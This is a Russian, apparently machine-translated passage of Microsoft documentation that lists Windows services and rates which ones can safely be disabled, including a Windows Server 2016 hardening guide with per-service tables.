Служба управления Windows (WManSvc) Руководство ⛔ Не отключать Выполняет управление, включая действия подготовки и регистрации.
служба общего доступа к сети Медиаплеер Windows (WMPNetworkSvc) Руководство �� ОК, чтобы отключить Предоставляет общий доступ к библиотекам Медиаплеер Windows другим сетевым проигрывателям и устройствам мультимедиа с помощью универсальной самонастраивающийся.
Служба хот-точки Windows Mobile (icssvc) Руководство �� ОК, чтобы отключить Предоставляет возможность обмениваться мобильными данными с другим устройством.
Установщик модулей Windows (TrustedInstaller) Руководство ⛔ Не отключать Позволяет устанавливать, изменять и удалять обновления Windows и дополнительные компоненты. Если эта служба отключена, установка или удаление обновлений Windows на этом компьютере может завершиться сбоем.
служба восприятия Windows (спектр) Руководство �� ОК, чтобы отключить Включает пространственное восприятие, пространственные входные данные и голографическую отрисовку.
Служба имитации восприятия Windows (восприятие) Руководство �� ОК, чтобы отключить Обеспечивает имитацию пространственного восприятия, управление виртуальными камерами и моделирование пространственных входных данных.
Системная служба push-уведомлений Windows (WpnService) Автоматически ⛔ Не отключать Эта служба выполняется в сеансе 0 и размещает платформу уведомлений и поставщик соединений, который обрабатывает подключение между устройством и сервером WNS.
Служба Windows PushToInstall (PushToInstall) Руководство �� ОК, чтобы отключить Обеспечивает поддержку инфраструктуры для Microsoft Store. Эта служба запускается автоматически и при отключении удаленных установок не работает должным образом.
Удаленное управление Windows (WinRM) Автоматически ⛔ Не отключать Служба удаленного управления Windows** (WinRM) реализует протокол WS-Management для удаленного управления. WS-Management — это стандартный протокол веб-служб, используемый для удаленного управления программным обеспечением и оборудованием. Служба WinRM прослушивает сеть для запросов WS-Management и обрабатывает их. Служба WinRM использует прослушиватель, настроенный с winrm.cmd помощью средства командной строки или групповой политики для прослушивания по сети. Служба WinRM предоставляет доступ к данным WMI и включает сбор событий. Сбор событий и подписка на события требуют запуска службы. Сообщения WinRM используют HTTP и HTTPS в качестве транспорта. Служба WinRM не зависит от СЛУЖБ IIS, но предварительно настроена для предоставления общего доступа к порту с IIS на том же компьютере. Служба WinRM резервирует префикс URL-адреса /wsman. Чтобы предотвратить конфликты с IIS, администраторы должны убедиться, что все веб-сайты, размещенные в IIS, не используют префикс URL-адреса /wsman.
Поиск Windows (WSearch) Руководство �� ОК, чтобы отключить Обеспечивает индексацию содержимого, кэширование свойств и результаты поиска файлов, электронной почты и другого содержимого.
Служба Безопасность Windows (SecurityHealthService) Автоматически ⛔ Не отключать служба Безопасность Windows обрабатывает единую защиту устройств и сведения о работоспособности.
Время Windows (W32Time) Автоматически ⛔ Не отключать Управляет синхронизацией даты и времени на всех клиентах и серверах в сети. Если эта служба остановлена, синхронизация даты и времени будет запрещена. Перенастройка службы времени Windows не рекомендуется.
Обновл. Windows (wuauserv) Руководство �� ОК, чтобы отключить Включает обнаружение, скачивание и установку обновлений для Windows и других программ. Отключение службы Обновл. Windows предотвращает Обновл. Windows, ее функцию автоматического обновления и программы не могут использовать API агента Обновл. Windows (WUA).
Служба Обновл. Windows медиков (WaaSMedicSvc) Руководство ⛔ Не отключать
Служба автоматического обнаружения веб-прокси WinHTTP (WinHttpAutoProxySvc) Руководство ⛔ Не отключать WinHTTP реализует стек клиента HTTP и обеспечивает разработчикам API Win32 и компонент автоматизации COM для отправки запросов HTTP и получения ответов. Кроме того, WinHTTP обеспечивает поддержку автообнаружения конфигурации прокси-сервера с помощью его реализации протокола автоматического обнаружения веб-прокси (WPAD). Все, что использует сетевой стек, может иметь функциональную зависимость от этой службы. Многие организации используют WinHTTPAutoProxySvc для настройки маршрутизации HTTP-прокси-сервера внутренних сетей. Без него внутренние исходящие HTTP-подключения к Интернету завершаются ошибкой.
Wired AutoConfig (dot3svc) Руководство �� ОК, чтобы отключить Служба Wired AutoConfig (DOT3SVC) отвечает за проверку подлинности IEEE 802.1X в интерфейсах Ethernet. Если текущее развертывание проводных сетей использует проверку подлинности 802.1X, необходимо настроить службу DOT3SVC для возможности подключения уровня 2 и предоставления доступа к сетевым ресурсам. Проводные сети, которые не применяют проверку подлинности 802.1X, не влияют на службу DOT3SVC.
Автоматическая настройка WLAN (WLANSVC) Руководство �� ОК, чтобы отключить Служба WLANSVC предоставляет логику, необходимую для настройки, обнаружения, подключения и отключения от беспроводной локальной сети (WLAN), определенной стандартами IEEE 802.11. Служба WLANSVC также содержит логику, чтобы превратить компьютер в точку доступа программного обеспечения, чтобы другие устройства или компьютеры могли подключаться к компьютеру беспроводной связи. Остановка или отключение службы WLANSVC делают все адаптеры WLAN на компьютере недоступными из сетевого интерфейса Windows. Отключение WLANSVC не рекомендуется, если у компьютера есть адаптер WLAN.
Адаптер производительности WMI (wmiApSrv) Руководство ⛔ Не отключать Предоставляет сведения из библиотеки производительности от поставщиков инструментария управления Windows (WMI) клиентам сети. Эта служба доступна только при активации модуля поддержки данных производительности.
Рабочие папки (workfolderssvc) Автоматически �� ОК, чтобы отключить Эта служба синхронизирует файлы с сервером рабочих папок, что позволяет использовать файлы в рабочих папках.
Рабочая станция (LanmanWorkstation) Автоматически ⛔ Не отключать Создает и поддерживает клиентские сетевые подключения к удаленным серверам по протоколу SMB. Если эта служба остановлена, эти подключения недоступны. Если эта служба отключена, все службы, которые явно зависят от нее, не запускаются.
Автоматическая конфигурация WWAN (WwanSvc) Руководство �� ОК, чтобы отключить Эта служба управляет данными мобильного широкополосного подключения (GSM и CDMA) карта/внедренных адаптеров модулей и подключений путем автоматической настройки сетей. Отключение WwanSvc не рекомендуется для лучшего взаимодействия с пользователями мобильных широкополосных устройств.
Служба управления доступом Xbox (XboxGipSvc) Руководство �� Должен быть отключен Эта служба управляет подключенными Аксессуарами Xbox.
Диспетчер проверки подлинности Xbox Live (XblAuthManager) Руководство �� Должен быть отключен Предоставляет службы аутентификации и авторизации для взаимодействия с Xbox Live. Если эта служба остановлена, некоторые приложения работают неправильно.
Xbox Live Game Save (XblGameSave) Руководство �� Должен быть отключен Эта служба синхронизирует данные сохранения игр для Xbox Live с поддержкой сохранения. Если эта служба остановлена, данные о сохранении игр не загружаются в Xbox Live или не загружаются.
Xbox Live Networking Service (XboxNetApiSvc) Руководство �� Должен быть отключен Эта служба поддерживает API-интерфейс Windows.Networking.XboxLive.

Дополнительные ресурсы

  • Использование PowerShell для управления службами.
  • Службы для каждого пользователя
  • Службы на основе узла службы
  • Руководство по отключению системных служб в Windows Server
  • Фон в системных службах.
  • Настройка запуска системных служб

Руководство по отключению системных служб в Windows Server 2016 с возможностями рабочего стола

Операционная система Windows содержит множество системных служб, которые предоставляют важные функции. Разные службы имеют разные политики запуска по умолчанию: некоторые запускаются по умолчанию (автоматически), некоторые при необходимости (вручную), а некоторые отключены по умолчанию и должны быть явно включены для запуска. Эти настройки по умолчанию были тщательно выбраны для каждой службы, чтобы сбалансировать производительность, функциональность и безопасность для типичных клиентов.

Тем не менее, некоторые корпоративные клиенты могут предпочесть для своих ПК и серверов под управлением Windows более ориентированный на безопасность баланс, который сокращает число направлений атак до абсолютного минимума, и поэтому могут пожелать полностью отключить все службы, которые не нужны в конкретных средах. Для этих клиентов корпорация Майкрософт (Microsoft®) предоставляет сопроводительное руководство относительно того, какие службы можно безопасно отключить для вышеуказанной цели.

Руководство предназначено только для Windows Server 2016 с возможностями рабочего стола (если не используется в качестве замены рабочего стола для пользователей). Начиная с Windows Server 2019, эти рекомендации настроены по умолчанию. Каждая служба в системе классифицируется следующим образом:

  • Следует отключить: предприятие, ориентированное на безопасность, скорее всего, предпочтет отключить эту службу и заставить ее функциональность (см. дополнительные сведения ниже).
  • ОК, чтобы отключить: эта служба предоставляет функциональные возможности, которые полезны для некоторых, но не всех предприятий, и ориентированных на безопасность предприятий, которые не используют его, могут безопасно отключить его.
  • Не отключайте: отключение этой службы повлияет на основные функциональные возможности или предотвратит правильное функционирование определенных ролей или функций. Поэтому ее не следует отключать.
  • (Нет рекомендаций ). Влияние отключения этих служб не было полностью оценено. Поэтому стандартную конфигурацию этих служб не следует изменять.

Пользователи на своих ПК и серверах с Windows могут отключить выбранные службы с помощью шаблонов безопасности в групповых политиках или с помощью средств автоматизации PowerShell. В некоторых случаях в руководство включены конкретные параметры групповой политики, которые напрямую отключают функциональные возможности службы вместо отключения самой службы.

Корпорация Майкрософт рекомендует отключить следующие службы и их соответствующие запланированные задачи в Windows Server 2016 с возможностями рабочего стола:

  1. Диспетчер проверки подлинности Xbox Live.
  2. Сохранение игр на Xbox Live.
  1. \Microsoft\XblGameSave\XblGameSaveTask.
  2. \Microsoft\XblGameSave\XblGameSaveTaskLogon.

Отключение служб, не установленных по умолчанию

Корпорация Майкрософт не рекомендует применять политики для отключения служб, которые не установлены по умолчанию.

  • Если компонент установлен, эта служба обычно требуется. Для установки службы или компонента требуются права администратора. Запретите установку компонента, а не запуск службы.
  • Блокировка службы Microsoft Windows не мешает администратору (или, в некоторых случаях, не администратору) устанавливать аналогичный сторонний аналог, возможно, с более высоким риском для безопасности.
  • Конфигурация базового состояния или тест производительности, который отключает нестандартную службу Windows (например, W3SVC), может создать у некоторых аудиторов ошибочное представление о том, что технология (например, IIS) изначально небезопасна и никогда не должна использоваться.
  • Если компонент (и служба) так и не устанавливается, это просто приведет к появлению ненужной нагрузки в конфигурации базового состояния и в процессе проверки.

В приведенных ниже двух таблицах приведены пояснения к столбцам и рекомендации корпорации Майкрософт по включению и отключению системных служб (перечисленных в этом документе) в Windows Server 2016 с возможностями рабочего стола.

Описание столбцов

Имя Описание
Имя службы Основное (внутреннее) название службы.
Description Описание службы из файла sc.exe.
Установка Всегда установлен: служба установлена в Windows Server 2016 Core и Windows Server 2016 с рабочим столом. Только с возможностями рабочего стола. Служба есть в Windows Server 2016 с возможностями рабочего стола, но отсутствует в основных серверных компонентах.
Тип запуска Тип запуска службы в Windows Server 2016
Рекомендация Рекомендация или совет корпорации Майкрософт по отключению этой службы в Windows Server 2016 в типичном хорошо управляемом корпоративном развертывании, где сервер не используется в качестве замены рабочего стола пользователя.
Комментарии Дополнительное объяснение.

Объяснение рекомендаций корпорации Майкрософт

Имя Описание
Не отключать Эта служба должна быть активной.
Можно отключить Эту службу можно отключить, если компонент, который она поддерживает, не используется.
Уже отключена Эта служба отключена по умолчанию (нет необходимости применять политику).
Следует отключить Эту службу никогда не следует включать в хорошо управляемой корпоративной системе.

В следующих таблицах приведены рекомендации корпорации Майкрософт по отключению системных служб в Windows Server 2016 с возможностями рабочего стола.

Установщик ActiveX (AxInstSV)

Имя Описание
Имя службы AxInstSV
Description Обеспечивает проверку контроля учетных записей пользователей для установки элементов ActiveX из Интернета и позволяет управлять установкой элемента ActiveX на основе параметров групповой политики. Эта служба запускается по требованию, и, если она отключена, установка элементов ActiveX будет осуществляться в соответствии с параметрами браузера по умолчанию.
Установка Только с возможностями рабочего стола
Тип запуска Руководство
Рекомендация Можно отключить
Комментарии Можно отключить, если компонент не нужен

Служба маршрутизатора AllJoyn

Имя Описание
Имя службы AJRouter
Description Выполняет маршрутизацию сообщений AllJoyn для локальных клиентов AllJoyn. Если эта служба остановлена, клиенты AllJoyn, у которых нет собственных маршрутизаторов, не смогут работать.
Установка Только с возможностями рабочего стола
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

Готовность приложений

Имя Описание
Имя службы AppReadiness
Description Готовит приложения для использования при первом входе пользователя в систему на этом компьютере и при добавлении новых приложений.
Установка Только с возможностями рабочего стола
Тип запуска Руководство
Рекомендация Не отключать
Комментарии нет

Удостоверение приложения

Имя Описание
Имя службы AppIDSvc
Description Определяет и проверяет удостоверение приложения. Отключение этой службы делает невозможным применение AppLocker.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

Служба сведений о приложениях

Имя Описание
Имя службы Appinfo
Description Облегчает запуск интерактивных приложений с дополнительными правами администратора. Если эта служба остановлена, пользователи не смогут запускать приложения с дополнительными правами администратора, которые могут им потребоваться для выполнения некоторых задач.
Установка Только с возможностями рабочего стола
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии Поддержка повышения прав для одного рабочего стола, доступного в функции контроля учетных записей

Служба шлюза уровня приложения

Имя Описание
Имя службы ALG
Description Обеспечивает поддержку сторонних подключаемых модулей протоколов для общего доступа к подключению Интернета.
Установка Только с возможностями рабочего стола
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

управление приложениями

Имя Описание
Имя службы AppMgmt
Description Обрабатывает запросы на установку, удаление и перечисление программного обеспечения, развернутого с помощью групповой политики. Если служба отключена, пользователи не смогут устанавливать, удалять или перечислять программное обеспечение, развернутое с помощью групповой политики. Если служба отключена, все явно зависящие от нее службы запустить не удастся.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

Служба развертывания AppX (AppXSVC)

Имя Описание
Имя службы AppXSvc
Description Обеспечивает поддержку инфраструктуры для развертывания приложений Store. Эта служба запускается по требованию, и, если она отключена, приложения Store не будут развернуты в системе и могут работать неправильно.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

Средство автоматического обновления часового пояса

Имя Описание
Имя службы tzautoupdate
Description Автоматически устанавливает часовой пояс системы.
Установка Только с возможностями рабочего стола
Тип запуска Выключено
Рекомендация Уже отключена
Комментарии нет

Фоновая интеллектуальная служба передачи (BITS)

Имя Описание
Имя службы BITS
Description Передает файлы в фоновом режиме, используя незанятую пропускную способность сети. Если служба отключена, то любые приложения, зависящие от BITS, такие как клиентский компонент Центра обновления Windows или MSN Explorer, не смогут автоматически скачивать программы и другие сведения.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

Служба инфраструктуры фоновых задач

Имя Описание
Имя службы BrokerInfrastructure
Description Служба инфраструктуры Windows, управляющая фоновыми задачами, которые могут выполняться в системе.
Установка Только с возможностями рабочего стола
Тип запуска Автоматически
Рекомендация Нет рекомендаций
Комментарии нет

Базовый механизм фильтрации

Имя Описание
Имя службы BFE
Description Базовый модуль фильтрации (BFE) — это служба, которая управляет политиками брандмауэра и IPsec и осуществляет фильтрацию в пользовательском режиме. Остановка или отключение службы BFE значительно снизит безопасность системы. Это также приведет к непредсказуемому поведению в приложениях управления IPsec и брандмауэра.
Установка Всегда устанавливается
Тип запуска Автоматически
Рекомендация Нет рекомендаций
Комментарии нет

Служба поддержки Bluetooth

Имя Описание
Имя службы bthserv
Description Служба Bluetooth поддерживает обнаружение и сопоставление удаленных устройств Bluetooth. Остановка или отключение этой службы может привести к неправильной работе уже установленных устройств Bluetooth и помешать обнаружению или сопоставлению новых устройств.
Установка Только с возможностями рабочего стола
Тип запуска Руководство
Рекомендация Можно отключить
Комментарии Можно отключить, если не используется. Другой механизм отключения: отключение Bluetooth и инфракрасного луча

CDPUserSvc

Имя Описание
Имя службы CDPUserSvc
Description Эта пользовательская служба используется для сценариев платформы подключенных устройств.
Установка Только с возможностями рабочего стола
Тип запуска Автоматически
Рекомендация Можно отключить
Комментарии Шаблон пользовательской службы

Распространение сертификатов

Имя Описание
Имя службы CertPropSvc
Description Копирует пользовательские и корневые сертификаты со смарт-карт в хранилище сертификатов текущего пользователя, определяет, когда смарт-карта вставлена ​​в устройство для чтения смарт-карт и, если необходимо, устанавливает мини-драйвер Plug-and-Play для смарт-карты.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

Служба клиентских лицензий (ClipSVC)

Имя Описание
Имя службы ClipSVC
Description Обеспечивает поддержку инфраструктуры для Microsoft Store. Эта служба запускается по требованию, и, если ее отключить, приложения, приобретенные с помощью Microsoft Store, будут работать неправильно.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

Изоляция ключей CNG

Имя Описание
Имя службы KeyIso
Description Служба изоляции ключей CNG размещается в процессе LSA. Она обеспечивает изоляцию процессов с закрытыми ключами и связанных с ними криптографических операций в соответствии с общими критериями. Служба хранит и использует долгоживущие ключи в безопасном процессе в соответствии с требованиями общих критериев.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

Система событий COM+

Имя Описание
Имя службы EventSystem
Description Поддерживает службу уведомлений о системных событиях (SENS), которая обеспечивает автоматическое распространение событий подписавшимся компонентам Component Object Model (COM). Если служба остановлена, SENS закроется и не сможет предоставлять уведомления о входе и выходе из системы. Если служба отключена, все явно зависящие от нее службы запустить не удастся.
Установка Всегда устанавливается
Тип запуска Автоматически
Рекомендация Нет рекомендаций
Комментарии нет

Системное приложение COM+

Имя Описание
Имя службы COMSysApp
Description Управляет настройкой и отслеживанием компонентов на основе модели COM+. Если служба остановлена, большинство компонентов на основе COM+ не будут работать должным образом. Если служба отключена, все явно зависящие от нее службы запустить не удастся.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

Браузер компьютеров

Имя Описание
Имя службы Браузер
Description Поддерживает обновленный список компьютеров в сети и предоставляет этот список компьютерам, обозначенным как браузеры. Если эта служба остановлена, этот список не будет обновляться или обслуживаться. Если служба отключена, все явно зависящие от нее службы запустить не удастся.
Установка Всегда устанавливается
Тип запуска Выключено
Рекомендация Уже отключена
Комментарии нет

Служба платформы подключенных устройств

Имя Описание
Имя службы CDPSvc
Description Эта служба используется для выполнения сценариев «подключенные устройства и универсальная прозрачность»
Установка Только с возможностями рабочего стола
Тип запуска Автоматически
Рекомендация Нет рекомендаций
Комментарии нет

Функциональные возможности для подключенных пользователей и телеметрия

Имя Описание
Имя службы DiagTrack
Description Служба «Функциональные возможности для подключенных пользователей и телеметрия» обеспечивает функции, которые поддерживают работу подключенных пользователей в приложении. Кроме того, эта служба управляет сбором информации на основе событий и передачей диагностических сведений и сведений об использовании (используемых для улучшения работы и качества платформы Windows), когда в разделе «Обратная связь и диагностика» включены параметры диагностики и конфиденциальности использования.
Установка Всегда устанавливается
Тип запуска Автоматически
Рекомендация Нет рекомендаций
Комментарии нет

Служба контактных данных

Имя Описание
Имя службы PimIndexMaintenanceSvc
Description Индексирует данные контактов для их быстрого поиска. Если вы остановите или отключите эту службу, данные контактов могут отсутствовать в результатах поиска.
Установка Только с возможностями рабочего стола
Тип запуска Руководство
Рекомендация Можно отключить
Комментарии Шаблон пользовательской службы

CoreMessaging

Имя Описание
Имя службы CoreMessagingRegistrar
Description Управляет взаимодействием между компонентами системы.
Установка Всегда устанавливается
Тип запуска Автоматически
Рекомендация Нет рекомендаций
Комментарии нет

Диспетчер учетных данных

Имя Описание
Имя службы VaultSvc
Description Обеспечивает безопасное хранение и получение учетных данных для пользователей, приложений и пакетов служб безопасности.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

Службы шифрования

Имя Описание
Имя службы CryptSvc
Description Предоставляет три службы управления: служба базы данных каталога, которая подтверждает подписи файлов Windows и позволяет устанавливать новые программы; Защищенная корневая служба, которая добавляет и удаляет сертификаты доверенного корневого центра сертификации с этого компьютера; и служба автоматического обновления корневых сертификатов, которая извлекает корневые сертификаты из Обновл. Windows и включает такие сценарии, как SSL. Если эта служба остановлена, эти службы управления не будут работать должным образом. Если служба отключена, все явно зависящие от нее службы запустить не удастся.
Установка Всегда устанавливается
Тип запуска Автоматически
Рекомендация Нет рекомендаций
Комментарии нет

Служба общего доступа к данным

Имя Описание
Имя службы DsSvc
Description Выполняет функции посредника при передаче данных между приложениями.
Установка Только с возможностями рабочего стола
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

DataCollectionPublishingService

Имя Описание
Имя службы DcpSvc
Description Служба сбора и публикации данных (DCP) поддерживает основные приложения для передачи данных в облако.
Установка Только с возможностями рабочего стола
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

Средство запуска серверных процессов DCOM

Имя Описание
Имя службы DcomLaunch
Description Служба DCOMLAUNCH запускает серверы COM и DCOM в ответ на запросы на активацию объектов. Если эта служба остановлена ​​или отключена, программы, использующие COM или DCOM, не будут работать должным образом. Настоятельно рекомендуется, чтобы служба DCOMLAUNCH была запущена.
Установка Всегда устанавливается
Тип запуска Автоматически
Рекомендация Нет рекомендаций
Комментарии нет

Служба сопоставления устройств

Имя Описание
Имя службы DeviceAssociationService
Description Обеспечивает связывание между системой и проводными или беспроводными устройствами.
Установка Только с возможностями рабочего стола
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

Служба установки устройств

Имя Описание
Имя службы DeviceInstall
Description Позволяет компьютеру распознавать изменения аппаратной части и адаптироваться к ним практически без участия пользователя. Остановка или отключение этой службы приведет к нестабильности работы системы.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

Служба регистрации управления устройством

Имя Описание
Имя службы DmEnrollmentSvc
Description Выполняет действия по регистрации устройств для управления устройствами
Установка Только с возможностями рабочего стола
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

Диспетчер настройки устройств

Имя Описание
Имя службы DsmSvc
Description Обеспечивает обнаружение, скачивание и установку программного обеспечения, относящегося к устройствам. Если эту службу отключить, то устройства могут быть настроены с устаревшим программным обеспечением и работать неправильно.
Установка Только с возможностями рабочего стола
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

Брокер фонового обнаружения DevQuery

Имя Описание
Имя службы DevQueryBroker
Description Позволяет приложениям обнаруживать устройства с фоновыми задачами
Установка Только с возможностями рабочего стола
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

DHCP-клиент

Имя Описание
Имя службы Dhcp
Description Регистрирует и обновляет IP-адреса и DNS-записи для этого компьютера. Если эта служба остановлена, этот компьютер не сможет получать динамические IP-адреса и выполнять обновления DNS. Если служба отключена, все явно зависящие от нее службы запустить не удастся.
Установка Всегда устанавливается
Тип запуска Автоматически
Рекомендация Нет рекомендаций
Комментарии нет

Служба политики диагностики

Имя Описание
Имя службы DPS
Description Служба политики диагностики позволяет обнаруживать проблемы с компонентами Windows, выполнять их диагностику и устранять их. Если эта служба остановлена, диагностика не будет работать.
Установка Всегда устанавливается
Тип запуска Автоматически
Рекомендация Нет рекомендаций
Комментарии нет

Узел службы диагностики.

Имя Описание
Имя службы WdiServiceHost
Description Узел службы диагностики используется службой политики диагностики для размещения диагностики, которая должна выполняться в контексте локальной службы. Если эта служба остановлена, любая диагностика, которая зависит от нее, больше не будет работать.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

Узел системы диагностики

Имя Описание
Имя службы WdiSystemHost
Description Узел системы диагностики используется службой политики диагностики для размещения диагностики, которая должна выполняться в контексте локального компьютера. Если эта служба остановлена, любая диагностика, которая зависит от нее, больше не будет работать.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

Клиент отслеживания изменившихся связей

Имя Описание
Имя службы TrkWks
Description Поддерживает связи между файлами NTFS внутри компьютера или между компьютерами в сети.
Установка Только с возможностями рабочего стола
Тип запуска Автоматически
Рекомендация Нет рекомендаций
Комментарии нет

Координатор распределенных транзакций

Имя Описание
Имя службы MSDTC
Description Координирует транзакции, охватывающие несколько диспетчеров ресурсов, таких как базы данных, очереди сообщений и файловые системы. Если остановить эту службу, эти транзакции не будут выполнены. Если служба отключена, все явно зависящие от нее службы запустить не удастся.
Установка Всегда устанавливается
Тип запуска Автоматически
Рекомендация Нет рекомендаций
Комментарии нет

dmwappushsvc

Имя Описание
Имя службы dmwappushservice
Description Служба маршрутизации push-сообщений WAP
Установка Только с возможностями рабочего стола
Тип запуска Руководство
Рекомендация Можно отключить
Комментарии Эта служба требуется на клиентских устройствах для Intune, MDM и аналогичных технологий управления, а также для объединенного фильтра записи. Не требуется для сервера.

DNS-клиент

Имя Описание
Имя службы Dnscache
Description Служба DNS-клиента (dnscache) кэширует имена доменных имен (DNS) и регистрирует полное имя компьютера для этого компьютера. Если служба остановлена, DNS-имена будут по-прежнему разрешаться. Однако результаты запросов имен DNS не будут кэшироваться, и имя компьютера не будет зарегистрировано. Если служба отключена, все службы, которые явно зависят от нее, не будут запускаться.
Установка Всегда устанавливается
Тип запуска Автоматически
Рекомендация Нет рекомендаций
Комментарии нет

Диспетчер скачанных карт

Имя Описание
Имя службы MapsBroker
Description Служба Windows для доступа приложений к скачанным картам. Эта служба запускается по требованию, когда приложение обращается к скачанным картам. Отключение этой службы сделает невозможным доступ приложений к картам.
Установка Только с возможностями рабочего стола
Тип запуска Автоматически
Рекомендация Можно отключить
Комментарии Отключение этой службы прерывает работу приложений, которые от нее зависят. Можно отключить, если приложения от нее не зависят.

Встроенный режим

Имя Описание
Имя службы embeddedmode
Description Служба «Встроенный режим» позволяет выполнять сценарии, относящиеся к фоновым приложениям. Если отключить эту службу, фоновые приложения не будут активироваться.
Установка Только с возможностями рабочего стола
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

Шифрованная файловая система (EFS)

Имя Описание
Имя службы EFS
Description Предоставляет основную технологию шифрования файлов, которая используется для хранения зашифрованных файлов в томах файловой системы NTFS. Если эта служба остановлена или отключена, доступ приложений к зашифрованным файлам не обеспечивается.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

Служба управления корпоративными приложениями

Имя Описание
Имя службы EntAppSvc
Description Позволяет управлять корпоративными приложениями.
Установка Только с возможностями рабочего стола
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

Расширяемый протокол проверки подлинности

Имя Описание
Имя службы EapHost
Description Служба расширяемого протокола проверки подлинности (EAP) обеспечивает проверку подлинности в сети в таких сценариях, как 802.1x (проводные и беспроводные сети), VPN и защита доступа к сети (NAP). EAP также обеспечивает поддержку программных интерфейсов (API), используемых клиентами доступа к сети, такими как беспроводной клиент и VPN-клиент, в процессе проверки подлинности. Если эта служба отключена, компьютеру не удастся получить доступ к сетям, требующим проверку подлинности EAP.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

Хост поставщика службы обнаружения

Имя Описание
Имя службы fdPHost
Description В службе FDPHOST размещаются поставщики обнаружения сетевых ресурсов компонента обнаружения функций. Эти поставщики обнаружения функций обеспечивают службы обнаружения сетевых ресурсов для протоколов SSDP и WS-D. Остановка или отключение службы FDPHOST приведет к отключению обнаружения сетевых ресурсов для этих протоколов при использовании обнаружения функций. Если эта служба недоступна, сетевые службы, работа которых зависит от компонента обнаружения функций и данных протоколов обнаружения, не смогут находить сетевые устройства или ресурсы.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

Публикация ресурсов обнаружения функции

Имя Описание
Имя службы FDResPub
Description Публикует этот компьютер и подключенные к нему ресурсы, чтобы их можно было обнаружить по сети. Если эта служба остановлена, сетевые ресурсы больше не будут публиковаться и не будут обнаруживаться другими компьютерами в сети.
Установка Только с возможностями рабочего стола
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

Служба географического положения

Имя Описание
Имя службы lfsvc
Description Эта служба отслеживает текущее расположение системы и управляет геозонами (географическое местоположение со связанными событиями). Если вы отключите эту службу, приложения не смогут использовать или получать уведомления для геолокации или геозон.
Установка Только с возможностями рабочего стола
Тип запуска Руководство
Рекомендация Можно отключить
Комментарии Отключение этой службы прерывает работу приложений, которые от нее зависят. Можно отключить, если приложения от нее не зависят.

Клиент групповой политики

Имя Описание
Имя службы gpsvc
Description Эта служба отвечает за применение параметров, настроенных администраторами для компьютера и пользователей, посредством компонента групповой политики. Если служба отключена, параметры не будут применены и управление приложениями и компонентами посредством групповой политики будет невозможно. Если служба отключена, могут не работать компоненты и приложения, зависящие от компонента групповых политик.
Установка Всегда устанавливается
Тип запуска Автоматически
Рекомендация Нет рекомендаций
Комментарии нет

Служба HID

Имя Описание
Имя службы hidserv
Description Активирует клавиши быстрого вызова на клавиатурах, пультах дистанционного управления и других мультимедийных устройствах, а также поддерживает их использование. Рекомендуется оставить эту службу активной.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Нет рекомендаций
Комментарии нет

Служба узла HV

Имя Описание
Имя службы HvHost
Description Предоставляет интерфейс для низкоуровневой оболочки Hyper-V, обеспечивающий функционирование счетчиков производительности по разделам для оперативной системы узла.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Не отключать
Комментарии Повышает производительность для гостевых виртуальных машин. Не используется сегодня, за исключением явно заполненных виртуальных машин, но будет использоваться в Application Guard.

Служба обмена данными (Hyper-V)

Имя Описание
Имя службы vmickvpexchange
Description Служба предоставляет механизм обмена данными между виртуальной машиной и операционной системой физического компьютера.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Не отключать
Комментарии См. сведения о службе HvHost

Интерфейс гостевой службы Hyper-V

Имя Описание
Имя службы vmicguestinterface
Description Предоставляет интерфейс для взаимодействия узла Hyper-V с определенными службами, которые выполняются на виртуальной машине.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Не отключать
Комментарии См. сведения о службе HvHost

Служба завершения работы в качестве гостя (Hyper-V)

Имя Описание
Имя службы vmicshutdown
Description Предоставляет механизм для завершения работы операционной системы этой виртуальной машины из интерфейсов управления на физическом компьютере.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Не отключать
Комментарии См. сведения о службе HvHost

Служба пульса (Hyper-V)

Имя Описание
Имя службы vmicheartbeat
Description Отслеживает состояние этой виртуальной машины, регулярно сообщая о пульсе. Эта служба помогает определить работающие виртуальные машины, которые перестали отвечать на запросы.
Установка Всегда устанавливается
Тип запуска Руководство
Рекомендация Не отключать
Комментарии См. сведения о службе HvHost

Служба PowerShell Direct для Hyper-V

Имя Описание
Имя службы vmicvmsession
